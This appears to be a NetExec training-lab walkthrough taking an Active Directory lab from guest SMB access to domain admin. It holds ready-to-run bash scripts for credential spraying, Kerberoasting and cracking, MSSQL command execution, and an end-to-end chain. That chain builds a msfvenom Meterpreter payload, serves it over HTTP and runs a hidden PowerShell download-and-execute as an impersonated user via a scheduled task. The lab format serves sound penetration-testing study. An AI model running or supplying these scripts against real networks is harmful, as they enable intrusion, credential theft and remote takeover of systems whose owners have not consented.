💃NetExec Training Lab
Here is my infrastructure for this lab:
I start by creating a host file with all my possible targets:
We can confirm the hosts are up with the following command:
Here we already have a list of all our targets, but if we wanted to discover hosts from scratch we could have run the following command:
It's long, so I did not run all of it, but here is what it looks like:
First I'll try to enumerate without any credentials:
Now I'll go and try to get some shares with the guest user:
Obviously I'll enumerate all the shares at once so we can save some time:
Here I'd grab the files with smbclient, but since this is an nxc lab I'll stay in scope (here is the smbclient command I would've used):
Funnily enough, the anonymous user can also enumerate the shares:
Then I saw that any user, even one that does not exist, can enumerate 😂 (the server maps unknown accounts to the Guest account; nxc flags such sessions with (Guest) on the authentication line)
To enumerate the shares we can do it many ways, but we are going to keep it simple ->
We see the folder where our output is stored, but since we don't have read access to the files we can't get anything:
Obviously we can spray a bit more on a whole list of targets with our host file:
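As an added example (not the lab page's own commands), here is a small bash script that runs the share enumeration above over every host in the host file with each of the three unauthenticated identities (guest, a null session, and a made-up user name), and filters nxc's --shares output down to the shares that are actually readable. The file name hosts.txt, the IP addresses, the user name "ghost" and the sample output are assumptions constructed for this example.

```shell
#!/usr/bin/env bash
# Added example, not from the lab page. Runs nxc share enumeration over a host
# file with several unauthenticated identities and keeps only readable shares.
# Assumptions: hosts.txt (one target per line) exists, nxc is on PATH, and the
# user name "ghost" is made up to demonstrate guest-mapped authentication.
set -u

HOSTS_FILE="${HOSTS_FILE:-hosts.txt}"

# Enumerate shares on every host as user "$1" with password "$2".
# An empty user and password gives a null session.
enum_shares() {
    nxc smb "$HOSTS_FILE" -u "$1" -p "$2" --shares 2>/dev/null
}

# Reduce nxc --shares output to "ip share permissions" for readable shares.
# Each share line looks like: SMB <ip> <port> <hostname> <share> [<perms>] [<remark>]
# When the permissions column is empty the remark shifts into column 6, so we
# only keep lines whose column 6 is a permission word. The header and separator
# rows ("Share", "-----") and the [*]/[-] status lines fail the same test.
readable_shares() {
    awk '$1 == "SMB" && $6 ~ /^(READ|WRITE|READ,WRITE)$/ { print $2, $5, $6 }'
}

# Sample nxc output, constructed by hand so the parser can be exercised offline.
SAMPLE_OUTPUT='SMB         192.168.1.10    445    FS01             [*] Enumerated shares
SMB         192.168.1.10    445    FS01             Share           Permissions     Remark
SMB         192.168.1.10    445    FS01             -----           -----------     ------
SMB         192.168.1.10    445    FS01             ADMIN$                          Remote Admin
SMB         192.168.1.10    445    FS01             C$                              Default share
SMB         192.168.1.10    445    FS01             IPC$            READ            Remote IPC
SMB         192.168.1.10    445    FS01             Public          READ,WRITE      Drop box
SMB         192.168.1.11    445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED'

if [ "${1:-}" = "run" ]; then
    # Live run: guest, null session, then a user that does not exist.
    for ident in "guest:" ":" "ghost:"; do
        user="${ident%%:*}"
        pass="${ident#*:}"
        echo "== user='$user' =="
        enum_shares "$user" "$pass" | readable_shares
    done
else
    # Offline demo on the constructed sample.
    printf '%s\n' "$SAMPLE_OUTPUT" | readable_shares
fi
```

Run it with `bash enum_shares.sh run` against the lab; without the argument it only parses the embedded sample. IPC$ showing as readable is normal and not a finding on its own; what you want is a named share with READ (or READ,WRITE) that you can then point spider_plus at.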
Now we are going to try and find some users that may have more privileges to read shares ->
So first we are going to try with null credentials (empty username and password) ->
We can see a user with a set of credentials, bingo 🎉
So now it's going to be really easy to enumerate the shares:
So we can see that we can access way more shares, let's download everything:
While checking the spider_plus folder we can see more than one file:
in the first folder we can go very deep, we'll check that out later:
And in the other file we have the share named Secret from earlier with an interesting note:
Another good thing to do is validate the credentials and check on which host they work:
If you see a green 🟩 plus sign ➕ on the output lines listing the hosts, the authentication worked!
❗Note: this only validates access over SMB, since that was our chosen protocol. On its own it does not mean that other forms of access, like the Remote Desktop Protocol, would work just as well.
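The credential check above, plus the caveat that a green [+] on SMB says nothing about other protocols, as an added example (this is not the lab page's own command): the script tries one credential against every host over several nxc protocols and sorts the result lines into admin, valid and failed. The host file name, the user jdoe, the password and the sample nxc output are all made up for this example.

```shell
#!/usr/bin/env bash
# Added example, not from the lab page. Checks one credential against every
# host in the host file over several protocols and classifies the result lines.
# Assumptions: hosts.txt exists, nxc is on PATH, and the user/password and the
# sample output below are made up for this example.
set -u

HOSTS_FILE="${HOSTS_FILE:-hosts.txt}"
USER_NAME="${USER_NAME:-jdoe}"
PASSWORD="${PASSWORD:-Summer2024!}"

# Try the credential on every host over one protocol ("$1").
# --continue-on-success only matters when -u/-p are lists: without it nxc stops
# spraying a host after the first working pair, so other valid users go unseen.
validate_creds() {
    nxc "$1" "$HOSTS_FILE" -u "$USER_NAME" -p "$PASSWORD" --continue-on-success 2>/dev/null
}

# Turn nxc result lines into "protocol ip verdict".
#   [+] ... (Pwned!)  -> admin   (local admin over SMB, or a shell over WinRM)
#   [+] ...           -> valid   (password accepted, no admin rights)
#   [-] ...           -> failed
classify_auth() {
    awk '$5 == "[+]" { print $1, $2, ($0 ~ /\(Pwned!\)/ ? "admin" : "valid") }
         $5 == "[-]" { print $1, $2, "failed" }'
}

# Print only "protocol ip" where the account has admin rights.
admin_hosts() {
    classify_auth | awk '$3 == "admin" { print $1, $2 }'
}

# Constructed sample output: SMB on three hosts, WinRM on the file server.
SAMPLE_OUTPUT='SMB         192.168.1.10    445    FS01             [+] netexec.lab\jdoe:Summer2024! (Pwned!)
SMB         192.168.1.11    445    DC01             [+] netexec.lab\jdoe:Summer2024!
SMB         192.168.1.12    445    WS01             [-] netexec.lab\jdoe:Summer2024! STATUS_LOGON_FAILURE
WINRM       192.168.1.10    5985   FS01             [-] netexec.lab\jdoe:Summer2024!'

if [ "${1:-}" = "run" ]; then
    # A green [+] on SMB does not imply RDP/WinRM/MSSQL access: test each one.
    for proto in smb winrm rdp mssql ldap; do
        validate_creds "$proto" | classify_auth
    done
else
    printf '%s\n' "$SAMPLE_OUTPUT" | classify_auth
fi
```

In the sample the account is local admin on FS01 over SMB but WinRM on the same box refuses it, which is exactly the situation the note above warns about: each protocol has its own access check, so validate on the one you intend to use.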
Now we are going to play around with bloodhound:
First we can log in through the web interface, but we quickly see that there is no data imported:
Next, we need to retrieve the information that Bloodhound can work with. Traditionally we would use something like SharpHound or other tools and do that semi-manually, but NetExec makes this even easier for us! ➡️
This will create a ZIP file, but we are more interested in the JSON files that are created in our current directory.
If you return to the Bloodhound user interface within Firefox, you can click to go to the File Ingest page and then upload files.
⬆️ Click the button to upload the data
📂 Navigate in the file explorer to the location of your new JSON files
⌨️ Hold Shift to click and select all of the JSON files created by NetExec.
🖱️ Click Upload.
✅ Confirm these are the files that you would like, and click Upload once more.
Then we can go to the Explore page to start looking at everything:
You can search for any object, like DOMAIN COMPUTERS@NETEXEC.LAB, explore its properties, and see what has relationships with what across the environment.
What we can do is toggle the search on the left-hand side to Cypher. This lets you enter a totally custom query in Cypher syntax, but we can also click the 📂 folder icon to see some pre-built queries that are already provided.
Scrolling down the list, one entry might be especially useful for us:
So now we have our initial attack path:
To go even quicker, we also specified an output file so we can start cracking the hashes offline ->
Let's use john to crack all of this:
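The Bloodhound collection step from earlier and the Kerberoast-then-crack step here both run through nxc ldap against the DC with the same domain credential, so here they are together as one added example (not the lab page's own command sequence). It also pulls the roasted account names and encryption types out of the hash file before cracking, because an RC4 ticket for a service account cracks far faster than an AES one and is worth starting with. The DC address, the user jdoe, the wordlist path and the sample hashes are made up for this example.

```shell
#!/usr/bin/env bash
# Added example, not from the lab page. Collects BloodHound data and
# Kerberoastable SPN accounts from the DC with one domain credential, lists
# which accounts were roasted (and with which encryption type), then cracks.
# Assumptions: the DC address, domain user, wordlist path and the sample
# hashes below are made up for this example; nxc and john are on PATH.
set -u

DC="${DC:-192.168.1.11}"
DOM_USER="${DOM_USER:-jdoe}"
DOM_PASS="${DOM_PASS:-Summer2024!}"
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"
HASH_FILE="${HASH_FILE:-kerberoast.txt}"

# BloodHound collection straight from nxc (JSON files land in the current dir).
# Pointing --dns-server at the DC avoids resolution failures from a non-domain box.
collect_bloodhound() {
    nxc ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" --bloodhound --collection All --dns-server "$DC"
}

# Request service tickets for every account with an SPN and save the hashes.
kerberoast() {
    nxc ldap "$DC" -u "$DOM_USER" -p "$DOM_PASS" --kerberoasting "$HASH_FILE"
}

# Print "account spn etype" for each hash on stdin so we can prioritise targets
# before burning cracking time. Two on-disk formats exist:
#   etype 23 (RC4):    $krb5tgs$23$*user$REALM$spn*$checksum$edata
#   etype 17/18 (AES): $krb5tgs$18$user$REALM$*spn*$checksum$edata
roasted_accounts() {
    sed -n \
        -e 's/^\$krb5tgs\$23\$\*\([^$]*\)\$[^$]*\$\([^*]*\)\*\$.*/\1 \2 rc4/p' \
        -e 's/^\$krb5tgs\$1[78]\$\([^$]*\)\$[^$]*\$\*\([^*]*\)\*\$.*/\1 \2 aes/p'
}

# RC4 tickets crack orders of magnitude faster than AES ones, so start there
# (john's krb5tgs format; hashcat modes 13100 / 19600 / 19700 cover 23/17/18).
crack_hashes() {
    john --format=krb5tgs --wordlist="$WORDLIST" "$HASH_FILE"
    john --show --format=krb5tgs "$HASH_FILE"
}

# Constructed sample hashes (ticket material replaced by filler hex).
SAMPLE_HASHES='$krb5tgs$23$*sql_svc$NETEXEC.LAB$MSSQLSvc/sql01.netexec.lab:1433*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
$krb5tgs$23$*svc_backup$NETEXEC.LAB$backup/fs01.netexec.lab*$fedcba9876543210fedcba9876543210$ffeeddccbbaa99887766554433221100
$krb5tgs$18$svc_web$NETEXEC.LAB$*http/web01.netexec.lab*$0011223344556677889900aabbccddeeff$aabbccdd'

if [ "${1:-}" = "run" ]; then
    collect_bloodhound
    kerberoast
    roasted_accounts < "$HASH_FILE"
    crack_hashes
else
    # Offline demo on the constructed sample.
    printf '%s\n' "$SAMPLE_HASHES" | roasted_accounts
fi
```

The SPN tells you what the account is for before you have its password: an MSSQLSvc SPN like the one in the sample is what points you at a database server next.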
So we have our password. Since this is an SQL service account, we can assume that MSSQL is running somewhere; let's check:
So now let's try accessing the database ->
If we don't know what to do next, we can use the famous help command ->
We are going to start by enumerating the database with the following command ->
OK, so I think we can guess where we have to go next ->
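The database enumeration above, written out as an added example (not the lab page's own commands): it walks databases, tables and rows through nxc mssql -q, bracket-quotes every identifier that comes back from the server so an odd table name cannot break the next query, and shows where -x (xp_cmdshell) fits in. The host, the sql_svc account, its password and the HR/dbo/Users names are assumptions for this example.

```shell
#!/usr/bin/env bash
# Added example, not from the lab page. Walks an MSSQL instance with nxc:
# databases -> tables -> rows, using bracket-quoted identifiers so names that
# come back from the server cannot break (or inject into) the next query.
# Assumptions: the host, the sql_svc account, its password and the
# HR/dbo/Users names are made up; nxc is on PATH.
set -u

SQL_HOST="${SQL_HOST:-192.168.1.20}"
SQL_USER="${SQL_USER:-sql_svc}"
SQL_PASS="${SQL_PASS:-Password123}"

# sql_svc is a domain account, so Windows auth (the default) is used. For a SQL
# login such as "sa" add --local-auth to the command instead.
mssql_query() {
    nxc mssql "$SQL_HOST" -u "$SQL_USER" -p "$SQL_PASS" -q "$1"
}

# Quote a T-SQL identifier: wrap it in [] and double any ] inside it.
sql_ident() {
    printf '[%s]' "$(printf '%s' "$1" | sed 's/]/]]/g')"
}

# User databases only (ids 1-4 are master, tempdb, model and msdb).
list_databases_query() {
    printf '%s' "SELECT name FROM master.sys.databases WHERE database_id > 4"
}

# Base tables inside one database, with their schema.
list_tables_query() {
    printf "SELECT TABLE_SCHEMA, TABLE_NAME FROM %s.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'" \
        "$(sql_ident "$1")"
}

# First rows of one table: arguments are database, schema, table.
dump_table_query() {
    printf 'SELECT TOP 50 * FROM %s.%s.%s' \
        "$(sql_ident "$1")" "$(sql_ident "$2")" "$(sql_ident "$3")"
}

# Run the three steps against the live server, ending on one table.
enum_instance() {
    mssql_query "$(list_databases_query)"
    mssql_query "$(list_tables_query "$1")"
    mssql_query "$(dump_table_query "$1" "$2" "$3")"
}

# Same account, OS command execution through xp_cmdshell (when it is enabled,
# or the login is allowed to enable it); nxc wires this up behind -x.
mssql_exec() {
    nxc mssql "$SQL_HOST" -u "$SQL_USER" -p "$SQL_PASS" -x "$1"
}

if [ "${1:-}" = "run" ]; then
    enum_instance "HR" "dbo" "Users"      # assumed database/schema/table names
    mssql_exec "whoami"
fi
```

A table holding credentials, as in this lab, is the usual payoff of the rows step; if -x works as well, the SQL service account's host is a foothold in its own right.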
So now that we have a new domain user, let's go back to Bloodhound and mark the freshly compromised user as Owned:
And we can go and look at who this user is in the domain in the 'Member Of' section:
The FSADMIN group is very interesting, let's take the credentials and try to see where we get some action ->
The (Pwned!) message on the line for the host means this account is a local administrator on the file server! Bingo, that means we can get remote code execution ->
So nothing stops us from using other sweet tooling from NetExec. We can even easily dump the SAM database to find more hashes to crack!
Another good thing to know is that it can even look for logged-on users ->
We can see one new domain user whose session actually comes from a logon_server: DC01
Now our goal will be to impersonate an admin ->
NetExec gets clever, and can actually use scheduled tasks to immediately invoke a command as any logged-on user that we would like
Now the move is to get a reverse shell, let's craft a payload with msfvenom ->
Now let's open a new tab, run msfconsole and set up a listener:
Next, we need to get our payload.exe onto the target file server host!
Let's first split our terminal again and set up a Python server to host our payload:
Now let's make our target fetch the payload from our local server and execute it to get our reverse shell:
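The impersonation step (pick a domain user with a live session, run a command as them through a scheduled task) and the payload delivery just described, written out together as one added example; this is not the lab page's own command sequence. The addresses, the fsadmin credential, the da_admin session, the ports and the sample --loggedon-users output are assumptions for this example, and the column layout the parser expects is an assumption too.

```shell
#!/usr/bin/env bash
# Added example, not from the lab page. Finds a domain user with a live
# session on the file server, then uses nxc's schtask_as module to run a
# download-and-execute command as that user, delivering a Meterpreter
# payload served from our box.
# Assumptions: addresses, account names, ports and the sample nxc output are
# made up; nxc, msfvenom, msfconsole and python3 are on PATH.
set -u

FS_HOST="${FS_HOST:-192.168.1.10}"
ADMIN_USER="${ADMIN_USER:-fsadmin}"
ADMIN_PASS="${ADMIN_PASS:-FileServer2024!}"
LHOST="${LHOST:-192.168.1.50}"
LPORT="${LPORT:-4444}"
HTTP_PORT="${HTTP_PORT:-8000}"
PAYLOAD="${PAYLOAD:-payload.exe}"

# List sessions on the file server (needs local admin there).
loggedon_users() {
    nxc smb "$FS_HOST" -u "$ADMIN_USER" -p "$ADMIN_PASS" --loggedon-users 2>/dev/null
}

# Keep "DOMAIN\user logon_server" for sessions authenticated by a DC: those are
# the domain accounts worth impersonating. Sessions whose logon server is the
# host itself are local accounts and are dropped. Assumed column layout:
#   SMB <ip> <port> <host> DOMAIN\user logon_server: <server>
domain_sessions() {
    awk '$5 ~ /\\/ && $6 == "logon_server:" && toupper($7) != toupper($4) { print $5, $7 }'
}

# Windows one-liner: fetch the payload over HTTP and start it.
# Arguments: our IP, HTTP port, payload file name.
stager_cmd() {
    printf 'powershell -nop -w hidden -c "iwr http://%s:%s/%s -OutFile C:\\Windows\\Temp\\%s; Start-Process C:\\Windows\\Temp\\%s"' \
        "$1" "$2" "$3" "$3" "$3"
}

build_payload() {
    mkdir -p www
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="$LHOST" LPORT="$LPORT" -f exe -o "www/$PAYLOAD"
}

# Serve the payload in the background; a 200 for GET /payload.exe in this
# server's log is the first sign the stager ran.
serve_payload() {
    python3 -m http.server "$HTTP_PORT" --directory www &
}

# Meant for a second terminal, as in the walkthrough. "Meterpreter session 1
# opened" is the second sign.
start_handler() {
    msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST $LHOST; set LPORT $LPORT; exploit -j"
}

# Run the stager as the chosen logged-on user via a scheduled task.
run_as_user() {
    nxc smb "$FS_HOST" -u "$ADMIN_USER" -p "$ADMIN_PASS" -M schtask_as \
        -o USER="$1" CMD="$(stager_cmd "$LHOST" "$HTTP_PORT" "$PAYLOAD")"
}

# Constructed sample --loggedon-users output.
SAMPLE_OUTPUT='SMB         192.168.1.10    445    FS01             [+] Enumerated logged_on users
SMB         192.168.1.10    445    FS01             NETEXEC\da_admin                logon_server: DC01
SMB         192.168.1.10    445    FS01             FS01\localsvc                   logon_server: FS01'

if [ "${1:-}" = "run" ]; then
    target="$(loggedon_users | domain_sessions | head -n 1 | cut -d' ' -f1)"
    [ -n "$target" ] || { echo "no domain session on $FS_HOST" >&2; exit 1; }
    build_payload
    serve_payload
    echo "start the handler in another terminal (start_handler), then press Enter"
    read -r _
    run_as_user "$target"
else
    # Offline demo on the constructed sample.
    printf '%s\n' "$SAMPLE_OUTPUT" | domain_sessions
fi
```

The task runs in the chosen user's session, so the Meterpreter that calls back carries that user's token: if the session belonged to a domain admin, so does your shell. Use `stager_cmd` output directly with -x if you only want to run it as the admin account you already have, without impersonation.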
We got the two signs that our exploit worked:
- Your Python HTTP server receives a GET request for our payload.exe and returns a 200 status code for success.
- Your Metasploit handler displays: Meterpreter session 1 opened
We got our callback! 🔥
And just like that we are domain admin 🎉